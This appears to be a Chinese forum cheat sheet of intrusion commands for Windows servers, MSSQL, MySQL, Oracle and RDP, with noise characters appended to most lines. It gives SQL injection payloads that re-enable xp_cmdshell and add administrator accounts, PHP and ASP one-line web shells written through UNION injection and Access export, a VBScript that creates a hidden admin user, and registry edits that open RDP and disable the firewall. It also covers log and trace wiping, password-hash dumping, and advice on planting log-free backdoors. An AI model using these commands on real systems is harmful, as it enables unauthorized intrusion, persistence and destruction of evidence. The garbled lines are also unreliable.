. |, _" T$ p- D6 ?1 C3 Y; |4 x1.net user administrator /passwordreq:no
9 z) Y# B s( g& d2 ?6 M- @6 c+ G+ n& B这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了 l/ c+ l! @9 V7 q* T
2.比较巧妙的建克隆号的步骤
, }7 ~- M1 x. ]先建一个user的用户
& f# ?# _5 B# ]$ l! c然后导出注册表。然后在计算机管理里删掉
! z, x1 i$ J* T( Z, o' r1 U在导入,在添加为管理员组
! W( L2 w' j$ [9 v# L' K1 p3.查radmin密码
- h$ @& w# [1 ?% g0 K8 ^reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg, ?# }/ F4 J; @3 G) C' C
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
, H, y: @5 k5 r- |建立一个"services.exe"的项
D. G6 c2 B( ]4 z再在其下面建立(字符串值)
; c9 |* ?2 U4 G# b1 }+ w* x5 V0 d' n键值为mu ma的全路径3 t8 E- `) O9 G! }
5.runas /user:guest cmd
7 }. ^* o/ t' U: H测试用户权限!
; a; _/ p0 X" H4 V+ M% |; N+ E/ a9 I6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
$ S9 y( |! G8 ~( R7.入侵后漏洞修补、痕迹清理,后门置放:
( k2 ^: W9 @; x; r基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门) M/ R6 z! o, u" w- o! i. C4 J
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c# L9 I7 T% s3 ?% b% _* }
$ f) t" H1 H+ o" @' d: `5 ~7 ]for example6 T7 t' f# O. {; N( i6 O9 R+ s$ q/ z
, L: f5 \1 O( w- t' m& c! tdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
. M5 o7 a* \ u9 ^$ s5 [
/ c& ^% ~ B9 k; Tdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'8 E- z) Q+ h3 R/ X6 a3 K7 A' b) W% t5 T
# ], i1 J4 S; Y$ A9 w- a/ H$ ?
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了* f. O0 Q9 |4 a3 E" ?
如果要启用的话就必须把他加到高级用户模式
) [# x( w8 L( b" M! d可以直接在注入点那里直接注入! i0 ` }/ z8 }: K* D
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--& E; u* c8 ?" k; r' W& F6 J! |
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--7 I5 A% o4 f" S2 s2 a. D, r
或者
: ~: g6 H' V& E3 Tsp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'( t' C4 ~/ m& p% C
来恢复cmdshell。
5 A4 R* a; M# A- n; o+ p I2 {& O* Z& U
分析器
! C6 N4 a) ]: YEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--( r; e m( i. U& c
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
z/ }' _3 y9 J3 l7 n, N1 P10.xp_cmdshell新的恢复办法8 }- A. U0 V& {% X+ ?( |9 p
xp_cmdshell新的恢复办法3 o" N1 _; d# z. `# G8 B# j: I
扩展储存过程被删除以后可以有很简单的办法恢复:$ c# G4 i* T; U7 z+ X8 n4 ^
删除
5 T! ]9 [) o7 p8 h' r' M9 L- Ddrop procedure sp_addextendedproc) g( G7 A3 h1 B! w7 T: I
drop procedure sp_oacreate
0 F9 y5 `+ g" a. texec sp_dropextendedproc 'xp_cmdshell': C! B# W5 j6 u" b A
- `: l, f! Z5 C& u. g& s( F; L0 p
恢复
9 K4 k/ Q$ m; R; ?dbcc addextendedproc ("sp_oacreate","odsole70.dll")* G. T; h% O+ p/ I& {
dbcc addextendedproc ("xp_cmdshell","xplog70.dll"); x5 q9 @) a% H7 z
$ z# A2 A3 X( r T这样可以直接恢复,不用去管sp_addextendedproc是不是存在
3 Y; ~7 t' D& f6 t& Y* j" t( F2 Z+ y8 ?; F3 q
-----------------------------
, B. V1 q& U; n A9 E
; W2 }1 z% V4 m# |1 B$ H& u. ^删除扩展存储过过程xp_cmdshell的语句:
3 I: j; |* S7 C- U; D) A5 texec sp_dropextendedproc 'xp_cmdshell'
# f, N5 e! F( ]/ `( n5 `& U5 V, Z! g2 j( R! x; _1 \+ e$ M# e: O
恢复cmdshell的sql语句, [: D8 J) z+ ]# S
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
6 w, P" m4 b- ~9 _, _1 j
9 \) ~0 w+ X3 C+ g2 p
3 P4 n& g' A- Z, `5 a9 P7 e) y开启cmdshell的sql语句
( F+ e( c3 d( N) g: f
% G: A) B. l) u( i1 B; Cexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'5 @4 P2 |/ f5 j1 }, }6 H
; t9 y+ p5 Q* Y( M5 D
判断存储扩展是否存在
2 o4 p' H9 t: N& t& @# nselect count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
. Y M$ U1 f! v V. |返回结果为1就ok" f' i. z/ v+ \
4 b) @6 E- f+ h4 W$ K" o) w恢复xp_cmdshell
- x4 x" O x* L9 b, _7 k n. f6 vexec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
4 q# a$ F2 X2 L4 d% t返回结果为1就ok
1 y2 m# E- A# u
_, J2 t4 R S6 {否则上传xplog7.0.dll
9 N# ^: b, j0 S3 z0 w( uexec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
6 K% I7 Z6 U$ Y3 W8 k
0 q$ T/ L2 x6 ^9 M堵上cmdshell的sql语句
' o6 S# K# o- s+ U( dsp_dropextendedproc "xp_cmdshel- V+ S2 Z* P% Z
-------------------------+ u% C6 j1 [* E- d; p- m
清除3389的登录记录用一条系统自带的命令:
; {5 M4 m2 ^& D. U9 hreg delete "hkcu\Software\Microsoft\Terminal Server Client" /f
/ a* Q1 n4 t9 M$ Q' K/ i0 t; ^: v
+ p4 Y1 z L N8 y5 {6 ^; O8 _然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件4 s% G- ?& i* Q) N% G" [1 j
在 mysql里查看当前用户的权限
) e6 A9 E3 r& N$ B" b7 G; [show grants for
4 L" O5 v5 l) S" H( M( o1 v( t
- E/ t' [+ N. u% w! u+ t* _6 S. @以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
! `2 h% n0 g4 P7 f9 U' V7 q6 F# B+ L0 z; E% M- \" `6 T; p1 q
y* g; H N6 A P# l
Create USER 'itpro'@'%' IDENTIFIED BY '123';) d! f: y: z! O2 M; X
$ r% ?/ W- P% ?+ _% t g. Y
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION3 S5 `9 D: u0 g% n# i8 x2 k$ G1 @7 N
2 l, W2 D$ b" L9 w/ ]& J
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0/ l' i) K. E. b' R) m
, j4 N0 ~8 L5 i3 K, M( g
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
5 }, i" a7 Q: Z0 c3 p- y) U9 h! B7 a1 x
搞完事记得删除脚印哟。
5 x! \! |( Z$ t R. {. q8 i
" B( g X* G) l& @Drop USER 'itpro'@'%';
+ |% y0 H6 N1 B8 L/ q9 `/ x) S& M0 Z" N. `
Drop DATABASE IF EXISTS `itpro` ;
. k: l+ G8 z1 N8 F8 V# v
3 ^) D- f f; |当前用户获取system权限
5 F a: c1 d& g" A5 Ysc Create SuperCMD binPath= "cmd /K start" type= own type= interact
. G' R% [/ R+ `# M; r2 {5 Y9 Ssc start SuperCMD7 q4 O+ o$ C/ J
程序代码
8 n/ a+ m+ Z6 J8 _( R<SCRIPT LANGUAGE="VBScript">
& m( P) {( p: X; ?$ R& J# jset wsnetwork=CreateObject("WSCRIPT.NETWORK")
: g Y r4 E& Q" ios="WinNT://"&wsnetwork.ComputerName
* A/ K. S# P8 c, J8 t! JSet ob=GetObject(os)
4 ?6 k6 c* w; W7 ]: HSet oe=GetObject(os&"/Administrators,group")+ `& _( X) s% ~$ `
Set od=ob.Create("user","nosec")8 Y. O- E. }% J; Q+ [1 R% {% F
od.SetPassword "123456abc!@#"
3 j w+ m$ {) u, q% n U. Yod.SetInfo
, o$ t8 Z. M' ] M* k) fSet of=GetObject(os&"/nosec",user)7 ^* h' V: N8 {. B
oe.add os&"/nosec") u5 h% j1 I5 W: x# W% `
</Script>
T+ ?- `& p3 ]; ^* n<script language=javascript>window.close();</script>
8 k6 L1 M6 R$ T2 }5 N( F3 W7 w! f9 J
6 d0 n5 ^- A& ]8 Y H
5 z3 O! s( K& R& w7 B* A! g7 i7 E7 F8 b1 C: m) [" v
突破验证码限制入后台拿shell1 C. h* v. j% Y
程序代码
$ K; h k/ d4 `7 m4 ~REGEDIT4
' l/ ^. Z9 W8 v1 n6 @[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] ' ?7 Z o# {$ \7 u- }) i1 z% m3 K
"BlockXBM"=dword:000000009 s) X+ m, t% N$ {8 k: j3 b5 ]! o
7 x7 A: w% ?8 R9 X9 ] L0 @保存为code.reg,导入注册表,重器IE
, x% R9 ?9 L: Z y5 S% l就可以了" X4 {- e# U. z; T% D' a
union写马, J' q8 F4 B, O1 c
程序代码
G; u' n; g: Y' T# v" i8 ~www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
$ a8 r1 y# j m3 C# L, d+ b6 O7 ^; d8 i: s( T8 j) W
应用在dedecms注射漏洞上,无后台写马
% k: n) T5 C N& h: U' M; o Mdedecms后台,无文件管理器,没有outfile权限的时候$ Q# Q5 o( _7 {, H1 N: @: k6 r
在插件管理-病毒扫描里) m B; |/ F) L$ ^
写一句话进include/config_hand.php里3 r `; |: g! |+ f/ c8 C7 U2 u
程序代码
) G) K3 a' g! U& I% x' Q" u. r>';?><?php @eval($_POST[cmd]);?>4 k4 [) g* W: j. }4 T ~' v
3 v8 y- t" _5 s5 _. |
, m$ J6 D2 C% E Y7 X如上格式
9 G' U O: L& q3 b8 g! O0 U0 K* O6 r+ `5 _# Z- w3 R
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
u5 J% W9 l4 K7 L! h2 d程序代码
9 ~9 R- b- a j- U2 }select username,password from dba_users;
- o4 T8 U$ N9 Q% ?7 x1 @: e; r; p# }# M7 b. W* d
( X v7 ]/ M [6 m
mysql远程连接用户
- \, f! e5 @% M8 X3 [程序代码
+ ~8 D: v: F% S- R6 J
) r+ Y. T1 E$ @" c6 uCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
/ l7 C: [" T2 C1 a% y7 W( {GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION# H$ c5 ]9 v+ {4 c) O
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
% J0 z7 ]5 Y+ V, cMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;) Y8 O, G9 [( O8 N
0 _% p$ y1 i% W- I4 ?) f
) M9 t( g: X1 R5 S4 h$ `% o( B& g$ u9 d. }
. M( n. l2 l9 J4 a
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
3 |' w5 S4 [& m7 ]8 V* P" G6 o
; t" ]- V' l- a/ G1.查询终端端口
- W2 W( ^; \* p. o K0 ?! g7 B8 o/ [' _0 H2 V' q. R! [
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
1 P% i4 z6 [6 B, S+ l; Y4 Q! P* o! n& b# E
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"4 K8 k& |1 {0 V1 L$ y, x- K- v5 V, L
type tsp.reg
I, s% C" I. X9 R8 i' B
2 V# T2 W, S7 T0 H+ Q9 H2.开启XP&2003终端服务* e3 T) L c4 X% l# @9 B
/ d, g1 k- n& }
2 P1 K- Q7 w1 x7 J/ [ Z
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f# y" C. B; R6 m
, a1 h2 R$ @) N8 L+ O. v: j5 V, e4 |1 m. V; v3 ~
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f* [' I1 C4 }2 M- b) @. N7 C
8 G3 Y" T+ d U1 x
3.更改终端端口为20008(0x4E28)/ C7 E# ]3 z* }- ~6 o/ |
% Y9 l6 i$ B& S% f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
, Z7 ^- {1 i0 V- N6 s5 Z# a! S; N9 p; Z& I- P) R
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f4 k5 ?- _9 k) i2 ~7 u) S
$ U, k. H+ H9 } t# V4 N
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制, w( Q8 v( M; z" B$ `
. H7 b3 [5 G" L, p) k2 i9 [REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f0 M' A0 ~* [# `
8 i5 n: V7 M6 {9 b! _( R
/ f$ h; P0 O; L; q* z( L5.开启Win2000的终端,端口为3389(需重启): J" K% ~" L, V. X2 ?2 x
0 q$ ~$ I3 |9 V) becho Windows Registry Editor Version 5.00 >2000.reg
1 A& R; {! A0 |- ]echo. >>2000.reg) D [ Z3 Z# O6 m: C
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg . M0 ~ x% L0 X
echo "Enabled"="0" >>2000.reg
- B7 S9 G2 {; H1 D/ Pecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
3 A! e2 `; s5 \$ K4 |echo "ShutdownWithoutLogon"="0" >>2000.reg 9 z) r! u. [" G$ l1 Q6 W4 `5 p
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg 4 [# G# ]8 h& u; x
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg . }) z: [) M3 e" ^; T2 b
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg & m5 b- Q, ]! P7 | C6 j! J
echo "TSEnabled"=dword:00000001 >>2000.reg
# r' d+ X# t% Z+ |9 G9 [* r) Decho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg 3 l( z4 j) b( _1 {8 s
echo "Start"=dword:00000002 >>2000.reg ! q0 E. R7 {4 [( R/ A8 k& ]2 p+ f
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
# R/ P( o& `, w" M4 I$ \echo "Start"=dword:00000002 >>2000.reg
4 }' z6 F9 c4 e5 D! cecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
/ e/ {- c( r+ X+ Z Qecho "Hotkey"="1" >>2000.reg ' b3 ?4 A. C m) }7 `4 c4 ?
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
1 z8 z2 e6 q+ ~echo "ortNumber"=dword:00000D3D >>2000.reg 2 M/ F9 F9 H# N4 q
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
5 C; w6 K, P/ g. kecho "ortNumber"=dword:00000D3D >>2000.reg2 ^2 b3 s5 x) w/ ^( G" J+ F& o7 K
9 h9 a6 _9 h6 D! i, q2 [
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启): Y% p' ]- q6 }9 k' D5 ]
: C/ f+ Q8 R' f9 v6 Q% z@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
$ u. W7 e9 I8 b(set inf=InstallHinfSection DefaultInstall)) v! ~6 ~. P! t) u! a4 z
echo signature=$chicago$ >> restart.inf8 J6 [6 q2 K" C0 `
echo [defaultinstall] >> restart.inf2 e _: g* E, c' T4 P" B5 D
rundll32 setupapi,%inf% 1 %temp%\restart.inf4 X. e3 C2 b% G5 s4 h# y x* }4 Y
! H2 H& G7 q+ I
7 o$ D m! H: @7.禁用TCP/IP端口筛选 (需重启)6 \7 ]! U# _+ G( r
. p0 Y9 T7 w" ^& d5 ~2 q5 \9 |
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
( e9 V& @& O4 s7 I5 }3 U0 r; f* x7 K9 f% t# [- Q& {: M" C/ A& d
8.终端超出最大连接数时可用下面的命令来连接
7 }5 @6 R# q. ^6 D, y: g% D4 `( f: q6 p$ }" [
mstsc /v:ip:3389 /console+ t( ?: a' r, H" G* R
" z9 b2 @/ I& W5 w* l! J/ {9.调整NTFS分区权限
9 d7 R' `* `: d7 `) O. _2 w0 U( a! J, Y# h& O$ l
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
5 U0 h% k5 k( B
- Q- w+ ^5 }, mcacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
$ F2 A2 j& l8 n4 \
1 Y1 J- |2 k/ e d3 T! U------------------------------------------------------" ?: v# G* a0 ]: _3 A$ R; p! }
3389.vbs 1 O* s/ n2 T; ^9 m& q
On Error Resume Next
# w( c: L; J4 aconst HKEY_LOCAL_MACHINE = &H800000022 X1 t# K# U- a' R
strComputer = "."4 b. \: X: u% x2 Z- e) b
Set StdOut = WScript.StdOut' C( | B( E9 t. d) F/ [' Z3 p
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_) i3 R; q6 I9 j2 E& Y8 z6 x- I5 _9 W
strComputer & "\root\default:StdRegProv")
3 \% F( y u) q+ T3 J# N& dstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"9 U" J1 I/ G' J6 R" A4 G
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
9 `, C4 m# V( }: ]( ? A# w' r9 KstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
. }( G, S( b; o3 d( H6 c* R" zoreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath7 s! X& c. ]7 e( H. w; t8 b. E
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"* k# t! a0 d/ @4 ^: n6 D
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"5 g+ S# n/ }" w/ U
strValueName = "fDenyTSConnections", `+ N* k2 ~4 `. `
dwValue = 07 ^9 v# p* h/ P; y& z7 F9 l
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
1 p2 @8 a6 o+ d. V4 i8 bstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"2 u# \ \5 a, G; F
strValueName = "ortNumber"
* x! k8 d ^& [7 {" qdwValue = 3389( j. x+ y3 d5 K- ~
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
4 N2 Y. R( @0 B6 f' V8 k: f& NstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
1 j7 J2 W7 w( f: @( BstrValueName = "ortNumber"; @( L% y C( v' F$ o
dwValue = 33898 r% _" x3 B) }2 K9 b
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
. m- q- B3 z% r/ YSet R = CreateObject("WScript.Shell")
8 |1 J( V/ u. X. p* `R.run("Shutdown.exe -f -r -t 0")
- c7 h! L. ?& {% `& _4 L4 u$ V$ \9 Z, m9 U& I0 y2 a
删除awgina.dll的注册表键值
. M t0 q" v1 [" ]# _1 D) m程序代码
* p' F9 j. b [! K! X( @ `- y' x5 m0 Y2 b6 f! D. [# Q
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f7 v/ ~: s4 j) @# {
5 d4 A0 g w& W5 O" h6 [
( c; j# N1 S4 ?0 ]+ K4 c
+ w7 P" X2 }( t
3 G; r# [3 |& j2 f( i; J4 G程序代码8 l8 }. O0 j6 T( l9 m8 r5 k
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash( Z2 f: E4 o0 v* o* K) y- H
2 r: k n/ d$ B& K4 F
设置为1,关闭LM Hash6 W2 g ~! [8 f+ m0 R
6 X/ Q, u6 q) s数据库安全:入侵Oracle数据库常用操作命令
+ F$ ]9 a! W4 d; i) b% b( J最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。
" ?( i/ ?! K% K! l3 Q3 ], t( t1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。8 u9 }3 s7 C" L. N% {* E
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
1 J. o0 Z( s+ c4 w9 }: U5 I; c& ]3、SQL>connect / as sysdba ;(as sysoper)或
% d. t- D" P6 E7 J0 R7 {connect internal/oracle AS SYSDBA ;(scott/tiger)
5 }& z, S8 K' j8 o, `conn sys/change_on_install as sysdba;3 y& p: F$ C7 Y8 d
4、SQL>startup; 启动数据库实例
0 _ k, d7 F! `: u; H5、查看当前的所有数据库: select * from v$database;% V, G* J0 I0 Z! e+ S {& L
select name from v$database;) v$ H9 _. o7 q
6、desc v$databases; 查看数据库结构字段
E7 Y N$ o4 S% I7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
- q! B) z0 a4 m. r/ h: W0 d3 MSQL>select * from V_$PWFILE_USERS;% g; q+ h; @# Z5 T; {
Show user;查看当前数据库连接用户0 q' b4 H8 ?9 w6 q5 T) {
8、进入test数据库:database test;
7 ~0 p! [1 r, w9、查看所有的数据库实例:select * from v$instance;: x X' f0 \5 E/ `
如:ora9i
! I1 a4 U" b" S% [10、查看当前库的所有数据表:) t0 p$ ?8 e' A0 o, F
SQL> select TABLE_NAME from all_tables;4 l+ P* Z1 n# A2 \: q) c* [
select * from all_tables;
# q; K9 v# d* b6 M8 D5 |+ SSQL> select table_name from all_tables where table_name like '%u%';
/ L/ L& I" r: a- \TABLE_NAME, j- r6 y7 r: F, I, {
------------------------------( _ r% C( P2 c2 H
_default_auditing_options_
9 U) w7 v3 D0 h" v, L# i; a11、查看表结构:desc all_tables;7 E3 r2 i8 V) L- D5 Q
12、显示CQI.T_BBS_XUSER的所有字段结构:
) s' C: {. k* D; S! X" q* sdesc CQI.T_BBS_XUSER;
: S3 w3 R! r+ A. }1 Y: C/ B. o13、获得CQI.T_BBS_XUSER表中的记录:0 O8 R* e8 d1 b' L
select * from CQI.T_BBS_XUSER;: {7 F* a8 g' e# M! M! T" V
14、增加数据库用户:(test11/test)2 P) Q! N+ Z3 n/ E! x; G) ?5 d+ t
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
' k& F' j N8 d6 v1 C9 u" g5 l' k15、用户授权:
z, E/ g1 j4 s) pgrant connect,resource,dba to test11;
. c9 a0 u0 n/ C1 n0 v- W7 M$ c- a# }grant sysdba to test11;
/ z' U: `7 |8 b% z( z# ~1 Acommit;
8 Y( u: Y) G& j2 z7 h16、更改数据库用户的密码:(将sys与system的密码改为test.)
# i \0 {7 N5 u2 q) Ralter user sys indentified by test;
9 _3 Y* P: @; v3 u6 falter user system indentified by test;$ \/ {3 @6 U, X$ K. v
& ]% r! K" g, t( a( a( ^4 A
applicationContext-util.xml. j- w& a3 h0 d3 u5 c
applicationContext.xml
& J: e0 O6 Y( m3 o/ i% Qstruts-config.xml
2 c8 q6 ]2 ~5 S5 _- U0 @! a9 Oweb.xml7 p; x( l+ q5 F
server.xml
: M5 @8 ]% @" ktomcat-users.xml% J7 O3 {0 A( o# p. M
hibernate.cfg.xml
$ E$ @% s& ]! ]. ldatabase_pool_config.xml/ C0 T# [5 a9 C* g& C
' `) G ^8 B" n* n. j1 g3 c$ o& m( K
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置" ^1 l" Q8 T$ s; _6 @- J
\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini; _, ?6 ]' i/ T0 @1 ]
\WEB-INF\struts-config.xml 文件目录结构. X- F! A( S1 t
, \" Z1 f0 y, b' {% v
spring.properties 里边包含hibernate.cfg.xml的名称. O, ^" d m( J% X5 R
: s0 C$ I& G* F0 m" _$ X r+ l" V# ~9 B4 |4 l% O
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
) R+ S. P& i7 N- n3 ] n5 }. E& X( ~7 ^# H
如果都找不到 那就看看class文件吧。。; a/ T8 i& Z+ g1 {' a
, k- I9 x, r4 X4 E% {7 m# y' C& ]
测试1:
4 M. M6 E' ^, {+ x% oSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1/ s1 G4 ~6 L- n! x! x
$ E( O9 N8 f, X; j. e2 C
测试2:$ Q0 A0 U. T6 P2 a
$ R. ] l8 f" p8 L4 y+ O9 ~0 gcreate table dirs(paths varchar(100),paths1 varchar(100), id int)
; ] @9 t3 P& `, p, q" W9 N, b' V2 Y$ v, N9 [3 v+ n3 r
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--7 g* R: L; a% d8 ^- b
- X7 o! y; ?4 X+ n0 b. u
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
. z* ]* W- e5 b: A8 m
3 l/ M8 A( b K6 J4 A查看虚拟机中的共享文件:
% J& x. Z, [; p; h. `5 q在虚拟机中的cmd中执行: t0 o8 I" n6 i& r! g
\\.host\Shared Folders* I' \. |( z2 d
: ~8 Y0 l0 c2 z) X1 }8 k: scmdshell下找终端的技巧5 A2 [! v2 O6 i% }5 {# Z8 U& Y
找终端: # X3 y; G, ?% |' P* L- b
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! 0 s5 U9 l1 s2 n. T) q+ ^ G1 ^
而终端所对应的服务名为:TermService
) N* r' s2 p* d, @4 {第二步:用netstat -ano命令,列出所有端口对应的PID值!
! W+ @1 H5 S4 x9 x/ b% s [ 找到PID值所对应的端口
9 g: g, A4 y/ F+ w) @
$ b8 Q+ f9 w h6 t B查询sql server 2005中的密码hash
6 j/ O! g7 p2 b# s. |' V( I- RSELECT password_hash FROM sys.sql_logins where name='sa'
2 g* I" h! a4 R1 E, G c: cSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
; f/ m1 A" k1 ?2 [( M2 Qaccess中导出shell
8 i8 `# O9 Z* `# ?5 `2 O' R
) G1 B5 a* Y* D T r* }中文版本操作系统中针对mysql添加用户完整代码:
" h* o7 K+ B9 u. N( t8 T/ u( V5 ~- @" n0 }4 W
use test;0 |& f% Z) u4 ]
create table a (cmd text);
